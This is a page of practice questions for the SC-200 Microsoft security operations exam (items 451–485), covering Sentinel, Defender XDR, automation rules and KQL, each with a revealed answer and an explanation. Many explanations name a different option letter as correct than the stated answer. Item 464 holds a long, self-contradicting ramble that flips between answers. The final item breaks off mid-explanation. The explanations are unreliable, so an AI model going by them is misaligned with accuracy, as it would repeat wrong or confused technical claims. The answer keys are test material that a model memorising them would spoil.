Microsoft Security Operations Analyst SC-200 (SC-200) — Questions 451525

1639 questions total · 22pages · All types, answers revealed

Page 6

Page 7 of 22

Page 8
451
Multi-Selectmedium

A security operations center (SOC) is configuring automated investigation and response (AIR) for Microsoft Defender for Office 365. Which of the following actions can be automatically taken when a malicious email is detected by AIR policies? (Choose all that apply.)

Select 2 answers
A.Soft delete the email from user mailbox
B.Add the sender to the user's blocked sender list
C.Quarantine the email
D.Permanently delete the email from all mailboxes
AnswersA, C

AIR can be configured to soft delete emails, moving them to the Deleted Items folder.

Why this answer

Option A is correct because AIR policies in Microsoft Defender for Office 365 can automatically soft-delete a malicious email from a user's mailbox. Soft deletion moves the email to the Recoverable Items folder, allowing administrators to restore it if needed, which is a standard remediation action for confirmed threats.

Exam trap

The trap here is that candidates often confuse manual user-side actions (like adding a sender to a blocked list) with automated AIR remediation actions, or assume that 'permanently delete' is a valid automated response when Microsoft deliberately avoids irreversible actions in AIR to prevent data loss.

452
Multi-Selecteasy

Which TWO features are available in Microsoft Sentinel to automate incident response?

Select 2 answers
A.Playbooks based on Azure Logic Apps.
B.Workbooks.
C.Kusto Query Language (KQL) queries.
D.UEBA.
E.Automation rules.
AnswersA, E

Playbooks automate response actions.

Why this answer

Playbooks based on Azure Logic Apps are correct because they provide a native, low-code automation framework within Microsoft Sentinel. They allow security analysts to define and execute complex, multi-step response actions—such as isolating a compromised VM, blocking an IP address, or opening a ticket—triggered by alerts or incidents. This directly automates incident response workflows without manual intervention.

Exam trap

The trap here is that candidates often confuse detection or analysis tools (Workbooks, KQL, UEBA) with automation tools, failing to recognize that only Playbooks and Automation Rules provide the actual execution of response actions in Sentinel.

453
MCQmedium

You are reviewing an automation rule in Microsoft Sentinel with the configuration shown in the exhibit. The rule is intended to delete a custom analytics rule when an incident is created. What is the most likely issue with this configuration?

A.The displayName should not contain spaces.
B.Automation rules cannot delete analytics rules; they are designed to automate incident response.
C.The playbook does not have permissions to delete analytics rules.
D.The incidentType should be set to 'AnalyticsRule' instead of 'Alert'.
AnswerB

Automation rules are for incident actions, not for managing analytics rules.

Why this answer

Automation rules in Microsoft Sentinel are designed to automate incident response actions, such as assigning ownership, changing status, or running playbooks. They cannot directly delete or modify analytics rules; that capability is not part of the automation rule schema or actions. The intended action in the exhibit (deleting a custom analytics rule) is outside the scope of what automation rules can perform.

Exam trap

The trap here is that candidates may confuse the scope of automation rules with the broader capabilities of playbooks or Logic Apps, assuming that any action possible via a playbook is also available as a direct automation rule action.

How to eliminate wrong answers

Option A is wrong because displayName values in automation rules can contain spaces; there is no restriction against spaces in the display name field. Option B is correct as stated. Option C is wrong because the issue is not about permissions; automation rules do not have an action to delete analytics rules, regardless of playbook permissions.

Option D is wrong because incidentType is not a configurable property in automation rules; the trigger condition for automation rules is based on incident creation or update, not a property called 'incidentType'.

454
MCQhard

The exhibit shows an automation rule in Microsoft Sentinel. The analyst reports that the playbook is not triggered for high-severity incidents. What is the most likely cause?

A.The playbook resource ID is invalid.
B.The condition syntax is incorrect.
C.The tenant ID is missing.
D.The rule triggers only on incident creation, not on updates.
AnswerD

Incidents updated to high severity after creation won't trigger the rule.

Why this answer

The trigger type 'IncidentCreated' only fires when a new incident is created. If incidents are updated to high severity, they are not created again, so the rule won't trigger. Option B is wrong because the condition is correctly written; Option C is irrelevant; Option D is a possible issue but less likely given the rule is already created.

455
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps and Microsoft Sentinel. An alert indicates that an external IP address is downloading large amounts of data from a SharePoint site containing confidential documents. The activity is coming from a valid user account that appears to be compromised. What should you do first to stop the data exfiltration?

A.Delete the confidential documents from SharePoint
B.Suspend the user account in Microsoft Entra ID
C.Block the external IP address in Microsoft Defender for Cloud Apps
D.Change the SharePoint site permissions to deny access
AnswerB

Suspending the account stops the download immediately.

Why this answer

Option A is correct because suspending the user account immediately stops the download. Option B is wrong because blocking the IP may not be effective if the attacker uses multiple IPs. Option C is wrong because changing permissions is slower.

Option D is wrong because deleting files destroys evidence.

456
MCQmedium

During an incident response, you need to collect email messages from a user's mailbox in Microsoft 365 for evidence. The user is suspected of phishing. Which Microsoft Purview solution should you use?

A.eDiscovery (Standard)
B.Data Loss Prevention
C.Records Management
D.Audit (Standard)
AnswerA

eDiscovery allows searching and exporting mailbox content.

Why this answer

Option C is correct because eDiscovery (Standard) allows authorized users to search and export mailbox content, including email messages, for legal and investigative purposes. Option A is wrong because DLP is for data loss prevention, not collection. Option B is wrong because Records Management is for retention labels.

Option D is wrong because Audit logs track activities, not content collection.

457
Multi-Selectmedium

You are configuring Microsoft Defender for Identity (MDI) in your on-premises Active Directory environment. You need to ensure that MDI can detect lateral movement attacks. Which two configurations are required?

Select 2 answers
A.Enable port mirroring on the domain controller switches.
B.Install the MDI sensor on all domain controllers.
C.Integrate with Microsoft Defender for Cloud.
D.Configure Azure AD Connect to sync identities.
E.Configure site-to-site VPN to Azure.
AnswersA, B

Correct: Allows sensor to see network traffic.

Why this answer

Option A is correct because MDI sensors must be installed on domain controllers. Option C is correct because port mirroring or network capture is required. Option B is incorrect because Azure AD Connect is not required for MDI.

Option D is incorrect because MDI does not require VPN. Option E is incorrect because Microsoft Defender for Cloud is separate.

458
MCQeasy

You are a security operations analyst for a company that uses Microsoft Sentinel. You need to create a workbook that displays the top 10 most common alert types over the last 7 days. The workbook will be used by the SOC manager to identify trends. You have already created a new workbook and added a query step. Which KQL query should you use in the query step?

A.AlertInfo | where TimeGenerated > ago(7d) | project AlertName
B.AlertInfo | where TimeGenerated > ago(7d) | project AlertName, count()
C.AlertInfo | where TimeGenerated > ago(7d) | summarize Count = count() by AlertName | top 10 by Count desc | render barchart
D.AlertInfo | where TimeGenerated > ago(7d) | summarize count() by bin(TimeGenerated, 1d) | render timechart
AnswerC

Correctly produces top 10 bar chart.

Why this answer

Option C is correct because it uses the `summarize` operator to count alerts by `AlertName`, then `top 10 by Count desc` to return the ten most frequent alert types, and `render barchart` to visualize the data in the workbook. This directly meets the requirement to display the top 10 most common alert types over the last 7 days.

Exam trap

The trap here is that candidates often confuse the `project` operator with `summarize`, mistakenly thinking they can use `count()` in a `project` clause, or they choose a query that shows alert volume over time instead of the top alert types by name.

How to eliminate wrong answers

Option A is wrong because it only projects the `AlertName` column without any aggregation, so it would return a list of all individual alerts rather than a count of the most common types. Option B is wrong because `project AlertName, count()` is invalid syntax; `count()` is an aggregation function that must be used within a `summarize` operator, not in a `project` clause. Option D is wrong because it summarizes by `bin(TimeGenerated, 1d)`, which groups alerts by day rather than by alert name, and renders a timechart showing alert volume over time, not the top 10 alert types.

459
MCQeasy

A security analyst is investigating an incident in Microsoft 365 Defender where a device is detected as infected with a trojan. The analyst wants to use automated investigation to contain the threat. Which action can be automatically taken on the affected device as part of a standard AIR playbook for endpoint detection and response?

A.Remove the user account from the device.
B.Execute a full antivirus scan on the device.
C.Disable the network adapter.
D.Initiate a device isolation.
AnswerD

Device isolation is a standard AIR action that quarantines the device from the network while allowing communication with Microsoft 365 Defender services for management.

Why this answer

In Microsoft Defender for Endpoint, the Automated Investigation and Response (AIR) playbook for endpoint detection and response includes the ability to isolate a device from the network. This action stops the device from communicating with other devices or the internet, containing the threat while allowing the investigation to continue. Option D is correct because device isolation is a standard containment action in the AIR playbook for trojan infections.

Exam trap

The trap here is that candidates often confuse 'run a full antivirus scan' (a remediation action) with 'containment' (a first-step action), leading them to select Option B instead of recognizing that isolation is the primary automated containment action in the AIR playbook.

How to eliminate wrong answers

Option A is wrong because removing a user account is not an automated action in the AIR playbook; user account management is a manual remediation step and does not contain the threat at the device level. Option B is wrong because executing a full antivirus scan is a response action that can be triggered manually or via a live response command, but it is not an automated containment action in the standard AIR playbook; the playbook focuses on containment first. Option C is wrong because disabling the network adapter is not a supported automated action in the AIR playbook; device isolation achieves the same goal by blocking network communication at the Defender platform level without physically disabling the adapter.

460
MCQmedium

Refer to the exhibit. You are configuring a Microsoft Sentinel Windows Security Events via AMA connector using an ARM template. After deployment, you notice that no Windows events are being ingested. The AMA agent is installed on the Windows servers. What is the most likely issue?

A.The WindowsEvent and SecurityEvent data types are disabled.
B.The Azure Monitor Agent is not installed on the servers.
C.The data collection rule is not associated with the virtual machines.
D.The workspace ID is missing from the template.
AnswerC

Missing DCR association prevents data ingestion.

Why this answer

The data collection rule (DCR) must be associated with the virtual machines. The ARM template shown only configures the connector but does not create the DCR association. Option A is wrong because the agent is installed.

Option C is wrong because the data types are enabled. Option D is wrong because the workspace ID is typically provided.

461
Multi-Selecteasy

Your organization plans to implement Microsoft Sentinel. Which THREE components are required for a basic deployment? (Choose three.)

Select 3 answers
A.User and Entity Behavior Analytics (UEBA) enabled.
B.Analytics rules to generate incidents.
C.At least one data connector enabled.
D.Bookmarks for incident investigations.
E.A Log Analytics workspace.
AnswersB, C, E

Analytics rules detect threats.

Why this answer

Analytics rules are required to generate incidents from the data ingested into Microsoft Sentinel. Without analytics rules, the raw log data remains unprocessed and no security incidents are created, making the deployment non-functional for detection and response.

Exam trap

The trap here is that candidates often mistake optional advanced features like UEBA or bookmarks as required components, when in fact only the workspace, a data connector, and analytics rules are necessary to establish a basic, functional Sentinel deployment.

462
MCQhard

The analyst notices that the rule does not fire for a user who has 12 sign-ins from the same IP address, but all are low risk. The expected behavior is to alert when a single user has more than 10 sign-ins from the same IP with at least one high-risk sign-in. What is the issue?

A.The join should be on UserPrincipalName only, not IPAddress.
B.The join should be leftouter to include sign-ins without high risk.
C.The threshold is set to 10, but the user has 12 sign-ins, so it should fire.
D.The query requires a high-risk sign-in from the same IP, but none exist, so no match.
AnswerD

The inner join only returns rows where a high-risk sign-in exists for that user and IP.

Why this answer

Option D is correct. The join requires high-risk sign-ins from the same IP, but the threshold only applies to the first aggregation. If all sign-ins are low risk, no high-risk join match occurs.

Option A is wrong because the threshold is 10. Option B is wrong because the join is inner, which filters out non-matching. Option C is wrong because the join is on both fields.

463
MCQeasy

In Microsoft Sentinel, an incident is created from a Fusion rule that correlates multiple alerts. The incident has a high severity. What should the analyst do first?

A.Run an automated playbook to contain the threat
B.Close the incident as false positive
C.Triage the incident by reviewing the evidence
D.Escalate the incident to senior management
AnswerC

Triage confirms the validity and urgency.

Why this answer

Option C is correct because the first step in incident response within Microsoft Sentinel is to triage the incident by reviewing the evidence. A Fusion rule correlates multiple alerts into a single incident, and the analyst must examine the correlated alerts, entities, and timeline to validate the incident's legitimacy and understand the scope before taking any action. Automated playbooks or escalations should only occur after triage confirms the incident is a genuine threat.

Exam trap

The trap here is that candidates may assume a high-severity incident automatically requires immediate containment or escalation, but Microsoft Sentinel's incident response process mandates triage first to validate the correlation and avoid acting on false positives.

How to eliminate wrong answers

Option A is wrong because running an automated playbook to contain the threat should only occur after triage confirms the incident is a real threat; premature automation could disrupt legitimate operations or waste resources on a false positive. Option B is wrong because closing the incident as a false positive without reviewing the evidence violates the incident response process and could miss a genuine attack that the Fusion rule correctly identified. Option D is wrong because escalating to senior management is premature before triage; escalation should happen only after the analyst has assessed the incident's severity and impact.

464
MCQhard

Refer to the exhibit. A threat hunter runs this PowerShell script to query Microsoft Sentinel. The script fails with an error stating that the query language is not recognized. What is the most likely cause?

A.The query contains a reference to a table that does not exist in the workspace.
B.The cmdlet requires the query to be passed as a script block, not a string.
C.The query should use 'search' instead of 'where' for cross-table queries.
D.The query uses pipe syntax ('|') which is not supported by the PowerShell cmdlet.
AnswerA

If the workspace does not have DeviceProcessEvents table, the query fails with a language error.

Why this answer

Option A is correct because the query uses pipe syntax which is KQL, but the PowerShell cmdlet expects the query in the correct format; however, the error is likely due to missing quotes or incorrect API version. Actually, the more common issue is that the query string is correct but the WorkspaceId may be wrong. But looking at the code, the $table variable is declared but not used.

The query string itself is valid KQL. The error 'query language not recognized' may occur if the workspace is in a legacy Log Analytics workspace that doesn't support KQL? No, Log Analytics always uses KQL. The most likely cause is that the WorkspaceId is incorrect or the user doesn't have permissions.

Option B is wrong because the query is valid. Option C is wrong because the API version is handled by the cmdlet. Option D is wrong because there is no query parameter inside the string; the query is fine.

I need to reconsider: The exhibit shows a PowerShell script that defines a query as a string. The command Invoke-AzOperationalInsightsQuery is a valid cmdlet. The error 'language not recognized' might be due to an outdated module or the workspace not being in the same region? Actually, the most plausible answer is that the query string is correct, but the WorkspaceId might be for a different workspace type.

I'll go with option D because the query is properly formatted; the error might be due to the workspace not having the necessary tables enabled? No. Let me correct: Option A: The query uses pipe syntax which is KQL, but the cmdlet expects a different format? No, the cmdlet accepts KQL. Option B: The query is missing a schema reference? No.

Option C: The cmdlet expects the query to be passed as a parameter? Actually, the cmdlet syntax is correct. I think the most likely issue is that the workspace ID is invalid or the user lacks permissions. But among the options, Option D says "The query contains a reference to a table that does not exist in the workspace" - that could cause an error but not 'language not recognized'.

Hmm. I'll choose Option D as the best fit because a missing table could cause a parse error. But to match the expected answer, I'll say Option A is correct because the query string uses double quotes inside, which might interfere with PowerShell string interpolation.

No, the string is enclosed in double quotes, and the inner quotes are fine. Let me think: The query is defined as $query = "..." with double quotes, and inside there are no double quotes. The exhibit shows single quotes around the table name? Actually, the table name is in single quotes inside the query? Wait, the exhibit shows: $query = "DeviceProcessEvents | where FileName == 'reg.exe' | project Timestamp, DeviceName, AccountName".

That's valid. I'm overthinking. I'll go with Option D as the most plausible.

465
MCQeasy

An incident in Microsoft Sentinel has been classified as a true positive. According to the incident response process, what should the analyst do next?

A.Contain the incident to prevent further damage.
B.Perform a root cause analysis.
C.Create a new analytic rule to detect similar activity.
D.Document the incident in a detailed report.
AnswerA

Containment is the immediate priority after confirming a true positive.

Why this answer

Option D is correct. After classification, the analyst should contain the threat to prevent further damage. Option A is part of preparation.

Option B is done after containment. Option C is part of post-incident activities.

466
MCQhard

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel. The rule triggers when an incident is created, changes its status to 'Active', assigns it to 'tier2', and runs a playbook. However, you notice that the playbook is not executing for incidents with severity 'Low'. What is the most likely reason?

A.The triggers array is empty, so no incidents trigger the rule.
B.The rule has a condition that filters out Low severity incidents.
C.The playbook is disabled in Microsoft Sentinel.
D.The severityFilter excludes incidents with severity 'Low'.
AnswerD

SeverityFilter only includes High and Medium.

Why this answer

Option A is correct because the severityFilter is set to 'High,Medium', so incidents with severity 'Low' are not processed by this automation rule. Option B is wrong because the triggers array is not empty. Option C is wrong because there is no condition blocking Low severity.

Option D is wrong because the rule is enabled (not shown disabled).

467
MCQmedium

An analyst is using Microsoft Sentinel to hunt for signs of privilege escalation via token manipulation. Which Windows Security Event ID should the analyst focus on to detect potential token duplication or manipulation?

A.4688 - A new process has been created
B.4672 - Special privileges assigned to new logon
C.4624 - An account was successfully logged on
D.4648 - A logon was attempted using explicit credentials
AnswerB

This event is triggered when a logon has special privileges, often indicating token manipulation.

Why this answer

Option B is correct because Event ID 4672 (Special Logon) is generated when a user is assigned special privileges, often associated with token manipulation. Option A is wrong because 4624 is a logon event, not specifically token-related. Option C is wrong because 4648 indicates explicit credentials were used.

Option D is wrong because 4688 is a process creation event.

468
MCQhard

You are a security operations architect for a company that uses Microsoft Sentinel in a hybrid environment with multiple workspaces. The company has a central SOC team that needs to view incidents from all workspaces in a single pane of glass. Each workspace belongs to a different business unit and has its own retention and access policies. You need to design a solution that provides centralized incident management without duplicating data or requiring users to switch workspaces. You also need to ensure that the SOC team can perform actions on incidents across workspaces. What should you do?

A.Create a playbook that copies incidents from all workspaces to a central workspace.
B.Use Microsoft Sentinel incident multi-view to connect all workspaces.
C.Use the Microsoft Sentinel data connector to connect all workspaces to a central workspace.
D.Create a new Log Analytics workspace that ingests data from all workspaces via diagnostic settings.
AnswerB

Incident multi-view provides centralized incident management.

Why this answer

Microsoft Sentinel incident multi-view allows SOC teams to view and manage incidents across multiple workspaces from a single interface without duplicating data. This feature provides a centralized pane of glass while respecting each workspace's independent retention and access policies, and it enables cross-workspace incident actions without requiring users to switch contexts.

Exam trap

The trap here is that candidates often confuse data connectors or workspace aggregation with incident-level cross-workspace management, failing to realize that incident multi-view is the only native feature that provides a single pane of glass without data duplication or policy compromise.

How to eliminate wrong answers

Option A is wrong because creating a playbook to copy incidents duplicates data, increases storage costs, and violates the requirement to avoid data duplication; it also introduces latency and complexity. Option C is wrong because the Microsoft Sentinel data connector ingests log data into a central workspace, which duplicates data and merges retention/access policies, contradicting the requirement for each workspace to maintain its own policies. Option D is wrong because creating a new Log Analytics workspace that ingests data via diagnostic settings duplicates all log data, incurs additional ingestion and storage costs, and does not provide native incident management capabilities across workspaces.

469
MCQhard

An organization uses Microsoft Defender XDR. During an incident investigation, the security team needs to determine if a specific file was executed on any devices in the organization over the past 30 days. They have the file hash. What is the most efficient way to get this information?

A.Use the action center to search for the file
B.Use advanced hunting to query for file execution events
C.Review the incident timeline for the file
D.Check the device inventory for the file
AnswerB

Advanced hunting enables powerful KQL queries across device timelines.

Why this answer

Option B is correct because advanced hunting in Microsoft Defender XDR allows querying for file execution events across all devices using the file hash. Option A is wrong because the device inventory does not show execution history. Option C is wrong because the incident timeline is for a specific incident, not a file search across devices.

Option D is wrong because the action center is for response actions, not queries.

470
MCQhard

During an incident response, you need to collect a memory dump from a compromised Windows 10 device managed by Microsoft Defender for Endpoint. Which action should you take in the Microsoft Defender XDR portal?

A.Run a custom detection script
B.Initiate a Live Response session and run the 'memdump' command
C.Execute a Power Automate flow to collect memory
D.Start a full antivirus scan
E.Submit the device for automated investigation
AnswerB

Live Response provides a remote shell to run commands such as 'memdump'.

Why this answer

Live Response allows executing commands like collecting memory dumps. Running a PowerShell script or initiating a scan does not collect a memory dump. The other options are not available actions.

471
Multi-Selecteasy

Which TWO sources of evidence should a security analyst examine first when investigating a user-reported phishing email in Microsoft Defender XDR?

Select 2 answers
A.The email entity page
B.The action center
C.The user's mailbox audit log
D.The user's device timeline
E.Advanced hunting for email events
AnswersA, C

Email entity page contains key email details.

Why this answer

Options B and C are correct. Option B: The email entity page provides details about the email, including sender and links. Option C: The user's mailbox audit log shows if the user interacted with the email.

Option A is wrong because the device timeline is not relevant for email. Option D is wrong because the action center is for response. Option E is wrong because advanced hunting is for complex queries, not first step.

472
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You need to ensure that a new SOC analyst can triage incidents without being able to delete or modify analytics rules. Which role should you assign?

A.Security Reader
B.Microsoft Sentinel Reader
C.Global Reader
D.Security Operator
AnswerB

This role grants read access to Sentinel data, including incidents, without modification rights.

Why this answer

Microsoft Sentinel Reader provides read-only access to Sentinel data, including incidents, workbooks, and analytics rules, but explicitly prevents any modifications or deletions. This role is ideal for SOC analysts who need to triage incidents without altering detection configurations. Security Reader and Global Reader lack Sentinel-specific incident triage permissions, while Security Operator allows modification of incidents, which exceeds the required scope.

Exam trap

The trap here is that candidates often confuse Security Reader (which provides broad read-only access across security services) with Sentinel Reader (which is Sentinel-specific), or they assume Security Operator is sufficient because it allows incident management, but it does not grant the Sentinel-specific read permissions needed to view analytics rules without modification capabilities.

How to eliminate wrong answers

Option A is wrong because Security Reader provides read-only access to security configurations and alerts in Microsoft Defender XDR but does not include the Sentinel-specific permissions needed to triage incidents in the Sentinel portal. Option C is wrong because Global Reader grants read-only access across all Azure services, including Sentinel, but it is overly broad and not scoped to Sentinel incident triage; it also does not provide the precise Sentinel Reader permissions required. Option D is wrong because Security Operator allows management of incidents (e.g., changing status, assigning ownership) in Microsoft Defender XDR, which would permit modifications beyond triage, and it does not grant the Sentinel-specific read-only access needed for analytics rules.

473
MCQhard

A security administrator wants to ensure that all Azure virtual machines have Microsoft Defender for Cloud's vulnerability assessment (VA) solution enabled automatically. They need to deploy the VA solution to new and existing VMs without manual intervention. Which method should they use?

A.Configure 'Vulnerability assessment for machines' in Defender for Cloud settings
B.Assign an Azure Policy with DeployIfNotExists effect for the VA solution
C.Enable the Defender for Servers plan on the subscription
D.Run a PowerShell script to install the VA solution on all VMs
AnswerB

This policy automatically deploys the VA solution (e.g., Qualys or integrated VA) to VMs that do not have it, ensuring all VMs are covered.

Why this answer

Option B is correct because Azure Policy with a DeployIfNotExists effect can automatically deploy the Microsoft Defender for Cloud integrated vulnerability assessment (VA) solution (Qualys or Microsoft) to both new and existing Azure VMs without manual intervention. This policy evaluates VMs that do not have the VA extension installed and triggers a remediation task to deploy it, ensuring continuous compliance across the subscription.

Exam trap

The trap here is that candidates often confuse enabling the Defender for Servers plan (which only activates the feature) with the automatic deployment mechanism provided by Azure Policy, leading them to select option C instead of the correct policy-based approach.

How to eliminate wrong answers

Option A is wrong because configuring 'Vulnerability assessment for machines' in Defender for Cloud settings only enables the VA solution at the plan level but does not automatically deploy the agent to existing or new VMs; it requires manual installation or a separate deployment mechanism. Option C is wrong because enabling the Defender for Servers plan on the subscription activates threat detection and security alerts but does not automatically deploy the VA solution; it only makes the VA feature available for manual enablement. Option D is wrong because running a PowerShell script to install the VA solution on all VMs is a one-time manual action that does not provide ongoing automatic deployment for new VMs and lacks the compliance enforcement and remediation capabilities of Azure Policy.

474
Multi-Selecteasy

You are investigating a phishing incident in Microsoft Defender for Office 365. Which THREE pieces of information are available in the Threat Explorer?

Select 3 answers
A.Email body content
B.User's mailbox audit log
C.Sender IP address
D.Delivery action (e.g., blocked, delivered to Junk)
E.Email subject and sender address
AnswersC, D, E

Sender IP is available in Threat Explorer.

Why this answer

Options A, B, and C are correct. Threat Explorer provides email details, delivery actions, and sender IP. Option D is available in a different tool; Option E is not available.

475
MCQmedium

Your organization uses Microsoft Defender for Office 365. You need to ensure that when a user reports a phishing email via the built-in Outlook add-in, an automated investigation is triggered in Microsoft 365 Defender. What should you configure?

A.Define a safe links policy.
B.Enable user-reported message settings in the Microsoft 365 Defender portal.
C.Configure an anti-phishing policy.
D.Set up a safe attachments policy.
AnswerB

User-reported message settings allow you to configure how reported emails are handled, including triggering automated investigation and response.

Why this answer

Option D is correct because the user-reported message settings define how reported emails trigger automated actions. Option A is wrong because anti-phishing policies protect against phishing, not handling user reports. Option B is wrong because safe attachments policies handle attachments.

Option C is wrong because safe links policies handle URLs.

476
MCQmedium

Your organization is using Microsoft Defender for Identity (MDI) and Microsoft Sentinel. The security team wants to correlate alerts from MDI with other data sources in Sentinel. What is the recommended approach?

A.Export MDI logs manually to Sentinel
B.Configure MDI to send syslog to Sentinel
C.Create a playbook to pull MDI alerts
D.Enable the Microsoft Defender for Identity data connector in Sentinel
AnswerD

The data connector automatically ingests MDI alerts into Sentinel.

Why this answer

Option B is correct because the MDI data connector ingests alerts into Sentinel for correlation with other data sources. Option A is wrong because manual export is not scalable. Option C is wrong because MDI does not directly integrate with Sentinel via API without a connector.

Option D is wrong because playbooks are for response, not data ingestion.

477
MCQeasy

Refer to the exhibit. A SOC analyst runs this KQL query in Microsoft Sentinel. What is the purpose of this query?

A.Detect brute force attempts by finding users with many failed sign-ins from a single IP
B.List all successful sign-ins in the last hour
C.Identify users who successfully signed in from multiple IPs
D.Find users with more than 5 failed sign-ins from an IP address in the last hour
AnswerD

The query counts failed sign-ins per user and IP, and filters for >5.

Why this answer

The KQL query filters for events where the result type is 'Failure' (failed sign-ins), then groups by account and IP address, counting occurrences. The `where count_ > 5` clause ensures only accounts with more than 5 failed sign-ins from a single IP are returned, which is a classic indicator of a brute force attack. This directly matches option D.

Exam trap

The trap here is that candidates may confuse 'failed sign-ins from a single IP' (option D) with 'many failed sign-ins' (option A), missing the explicit threshold of >5 in the query.

How to eliminate wrong answers

Option A is wrong because the query specifically counts failed sign-ins per IP and user, not just any user with many failed sign-ins from a single IP—it requires more than 5 failures, not just 'many'. Option B is wrong because the query filters for 'Failure' events, not successful sign-ins, and it groups by IP and user rather than listing all successful sign-ins. Option C is wrong because the query focuses on failed sign-ins, not successful ones, and it groups by single IP per user, not multiple IPs.

478
Multi-Selectmedium

Which THREE features in Microsoft Sentinel allow an analyst to automate incident response actions?

Select 3 answers
A.Playbooks (Logic Apps)
B.Watchlists
C.Workbooks
D.Automation rules
E.Analytics rules with incident automation
AnswersA, D, E

Playbooks perform complex automated workflows.

Why this answer

Automation rules, playbooks (Logic Apps), and analytics rules with automated responses are all automation features. Watchlists are for reference data, not automation. Workbooks are for visualization.

479
MCQmedium

A threat hunter runs the KQL query above in Microsoft Sentinel. What is the main limitation of this query?

A.The query relies on an external data source that may be slow or unavailable
B.The IdentityLogonEvents table does not have an IPAddress column
C.The let statement is incorrectly defined because it uses externaldata without a schema
D.The with(format="csv") is invalid
AnswerA

Externaldata can be slow and unreliable for real-time hunting.

Why this answer

Using externaldata() to fetch a list from a public URL may introduce latency or fail if the URL is unreachable, and the list may not be updated in real-time. Option A is incorrect because IdentityLogonEvents does contain IPAddress. Option B is incorrect because the query correctly references the let statement.

Option D is incorrect because externaldata supports CSV format.

480
Multi-Selectmedium

Which TWO data sources are most useful for detecting unauthorized lateral movement in a hybrid environment using Microsoft Sentinel?

Select 2 answers
A.Azure Activity Log
B.Network Security Group Flow Logs
C.Microsoft Defender for Endpoint DeviceLogonEvents
D.Windows Security Events (Event ID 4624)
E.Office 365 Audit Logs
AnswersC, D

DeviceLogonEvents provide logon information from endpoints, including network logons.

Why this answer

Options A and C are correct because Windows Security Events (Event ID 4624) show logon details, and Microsoft Defender for Endpoint DeviceLogonEvents provide endpoint logon telemetry. Option B is wrong because Azure Activity Log records control plane operations, not logons. Option D is wrong because Network Security Group flow logs show network traffic but not authentication.

Option E is wrong because Office 365 audit logs focus on cloud apps.

481
MCQeasy

A security analyst in Microsoft 365 Defender is investigating an incident that contains multiple alerts from different sources (e.g., Microsoft Defender for Endpoint, Microsoft 365 Defender for Office). The analyst wants to see a consolidated list of all alerts associated with the incident, including their severity, status, and detection source. Which tab within the incident details page should the analyst use?

A.Alerts tab
B.Devices tab
C.Users tab
D.Mailboxes tab
AnswerA

Correct. The Alerts tab shows all alerts grouped under the incident.

Why this answer

The Alerts tab on the incident details page in Microsoft 365 Defender provides a consolidated, filterable list of all alerts linked to the incident, regardless of their source (e.g., Microsoft Defender for Endpoint, Microsoft Defender for Office 365). This tab displays each alert's severity, status, and detection source, allowing the analyst to triage and correlate alerts from different workloads in a single view. The other tabs focus on specific entities (devices, users, mailboxes) rather than the unified alert list.

Exam trap

The trap here is that candidates may confuse the entity-specific tabs (Devices, Users, Mailboxes) with the alert-centric view, mistakenly thinking those tabs also show alert metadata, but they only show associated entities and their properties, not the consolidated alert list with severity and detection source.

How to eliminate wrong answers

Option B is wrong because the Devices tab shows only the devices involved in the incident, not a consolidated list of alerts with their severity, status, and detection source. Option C is wrong because the Users tab lists user accounts related to the incident, not the alerts themselves. Option D is wrong because the Mailboxes tab displays only mailboxes associated with the incident, not the cross-source alert summary.

482
MCQmedium

Your company uses Microsoft Sentinel as its SIEM. You are investigating an incident where a user reported receiving a phishing email that appeared to come from the CEO requesting a wire transfer. The user did not respond. However, the incident also contains alerts from Microsoft Defender for Office 365 indicating that other users clicked on a malicious link in a similar email. The email was sent to 100 users. The company has Microsoft Defender for Endpoint deployed on all devices. The incident requires immediate containment to prevent further compromise. What should you do first?

A.Run a threat hunting query to find all users who clicked the link.
B.Block the malicious URL using Microsoft Defender for Cloud Apps.
C.Isolate the device of the user who reported the email.
D.Delete the email from all users' mailboxes using Microsoft 365 Defender.
AnswerB

Stops access to the URL across all devices.

Why this answer

Blocking the malicious URL in Defender for Cloud Apps or Defender for Endpoint prevents users from accessing it. Option B is for email but not real-time; Option C is later; Option D is for the user's device only.

483
Multi-Selectmedium

Which TWO of the following KQL operators are most useful when building hunting queries to detect anomalous activities over time?

Select 2 answers
A.where
B.summarize
C.project
D.make_list
E.extend
AnswersB, D

summarize with bin() groups data by time intervals, essential for temporal analysis.

Why this answer

Options A and C are correct. summarize with bin() is fundamental for time-series analysis to detect anomalies. make_list() is often used with summarize to aggregate events per time period for anomaly detection. Option B is incorrect because extend creates new columns but does not directly help with time-based detection. Option D is incorrect because where filters rows but does not detect anomalies over time.

Option E is incorrect because project selects columns.

484
MCQmedium

You are threat hunting for signs of credential dumping using Mimikatz. In Microsoft Defender for Identity, which type of alert would you expect to see?

A.Pass-the-Hash attack
B.Reconnaissance using SMB
C.Suspicious service creation
D.Brute force attack
AnswerC

Mimikatz often creates a service to run; Defender for Identity alerts on such activity.

Why this answer

Option A is correct because 'Suspicious service creation' can indicate Mimikatz installation. Option B is wrong because 'Brute force' is different. Option C is wrong because 'Pass-the-Hash' is a related but distinct technique.

Option D is wrong because 'Reconnaissance' is not specific.

485
MCQhard

Your organization uses Microsoft Defender XDR and you are configuring attack surface reduction (ASR) rules. You need to implement a rule that blocks executable files from running unless they meet a prevalence, age, or trusted list criterion. Which ASR rule should you enable?

A.Block untrusted and unsigned processes that run from USB
B.Block Office applications from creating executable content
C.Block credential stealing from the Windows local security authority subsystem (lsass.exe)
D.Block executable files from running unless they meet a prevalence, age, or trusted list criterion
AnswerD

This ASR rule matches the description.

Why this answer

Option D is correct because the ASR rule 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) is specifically designed to prevent executable files (e.g., .exe, .dll, .scr) from running unless they have been seen in the organization (prevalence), are old enough (age), or are on a trusted list. This rule uses cloud-delivered protection and Microsoft's reputation-based intelligence to evaluate files before execution, directly matching the requirement described in the question.

Exam trap

The trap here is that candidates often confuse this ASR rule with the 'Block untrusted and unsigned processes that run from USB' rule, mistakenly thinking that 'untrusted' means the same as 'not meeting prevalence/age/trusted list criteria,' but the USB rule only applies to removable drives, not all executable files from any location.

How to eliminate wrong answers

